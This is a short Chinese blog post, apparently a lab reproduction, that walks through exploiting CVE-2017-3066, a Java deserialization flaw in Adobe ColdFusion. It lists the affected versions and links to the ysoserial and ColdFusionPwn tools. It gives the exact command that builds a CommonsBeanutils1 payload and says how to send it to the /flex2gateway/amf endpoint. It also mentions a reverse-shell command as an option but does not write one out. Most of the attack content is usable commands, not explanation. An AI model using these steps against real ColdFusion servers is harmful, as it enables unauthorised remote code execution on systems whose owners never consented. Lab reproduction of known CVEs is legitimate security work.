Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
作者:互联网
影响版本
以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
工具地址
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
https://github-releases.githubusercontent.com/124920554/c78080be-261d-11e8-97f4-80ae25cc0cd9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210223%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210223T155244Z&X-Amz-Expires=300&X-Amz-Signature=4eec57835cfe0fde311cf3b35ed3a06ed5905960c4ea831b090e53d02d21ba0a&X-Amz-SignedHeaders=host&actor_id=77956516&key_id=0&repo_id=124920554&response-content-disposition=attachment%3B%20filename%3DColdFusionPwn-0.0.1-SNAPSHOT-all.jar&response-content-type=application%2Foctet-stream
使用工具
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-d367e379d9-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
POC生成于poc.ser文件中,将POC作为数据包body发送给http://192.168.49.2:8500/flex2gateway/amf,Content-Type为application/x-amf:
进入容器中,发现/tmp/success已成功创建
或者执行反弹命令
标签:CVE,Adobe,ColdFusion,ysoserial,jar,Amz,SNAPSHOT,版本,序列化 来源: https://www.cnblogs.com/bingtang123/p/14463420.html